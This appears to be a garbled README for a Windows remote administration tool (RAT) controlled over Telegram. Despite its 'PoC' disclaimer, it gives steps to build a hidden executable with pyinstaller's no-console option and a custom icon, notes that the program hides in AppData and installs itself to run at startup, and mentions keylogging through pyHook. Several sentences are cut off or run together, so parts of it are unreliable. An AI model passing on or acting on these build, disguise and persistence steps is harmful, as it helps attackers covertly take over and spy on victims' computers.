
Windows Remote Post Breach Tool via Telegram
Windows Remote Post Breach Tool via Telegram (Python 2.7), Originally created by Ritiek, Forked and modified by mvrozanti and then myself.
The whole purpose of this tool is to demonstrate (as a "PoC") the control of an already breached machine, via Telegram. As the same with my already written tools, I do not promote illegal activities.
This modified version uses Telegram bot API v2, instead of the traditional v1. The main change is keyboard buttons instead of text typing. I will try to add new features, close bugs and be compatible to the API v3, after adding the needed changes from "mvrozanti". In the meanwhile, cd, download, upload, run and delete commands will not work.

file to the Telegram botThe current Remote Administration Tools in the market face 2 major problems:
This RAT overcomes both these issues by using the Telegram bot API.
BotFather.pip install -r requirements.txt.64-bit or 32-bit depending on your system.
pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl.pip install pyHook-1.5.1-cp27-cp27m-win32.whl.python RATAttack.py.chat_id from the console and replace it in the script and comment out the line return True. Don't worry, you'll know when you read the comments in the script.
RATAttack will be created in your working directory containing and any files you upload to the bot.Replace your path in compileAndRun.bat (running this will actually run the executable)
Run `pyinstaller --onefile --noconsole C:\path\to\RATAttack.py`. You can also pass `--icon=<path\to\icon.ico>` to use any custom icon.
.exe file in C:\Python27\Scripts\dist\. You can change the name of the .exe to anything you wish..exe, the script will hide itself and infect your PC to run at startup. You can return to normal by using the /self_destruct option or manually removing C:\Users\Username\AppData\Roaming\Portal directory and C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\portal.lnk (although I recommend removing them manually for the time being)..exe file and location & name of the folder where the hidden .exe will hide itself. To do this; modify compiled_name and hide_folder respectively.The MIT License
keylogs.txt